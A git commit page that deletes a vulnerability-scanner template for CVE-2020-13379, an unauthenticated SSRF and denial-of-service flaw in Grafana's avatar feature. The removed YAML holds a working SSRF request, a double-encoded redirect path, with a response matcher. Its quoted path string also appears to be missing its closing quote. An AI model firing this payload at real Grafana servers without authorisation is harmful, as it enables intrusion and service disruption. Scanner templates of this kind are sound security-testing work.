Delete CVE-2020-13379.yaml
parent
2f7c40d80d
commit
13a3ee21f2
|
@ -1,18 +0,0 @@
|
|||
id: CVE-2020-13379
|
||||
# https://grafana.com/blog/2020/06/03/grafana-6.7.4-and-7.0.2-released-with-important-security-fix/
|
||||
# https://rhynorater.github.io/CVE-2020-13379-Write-Up
|
||||
info:
|
||||
name: Unauthenticated Grafana DoS
|
||||
author: joeldeleep
|
||||
severity: medium
|
||||
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "image/jpeg"
|
||||
part: header
|
Loading…
Reference in New Issue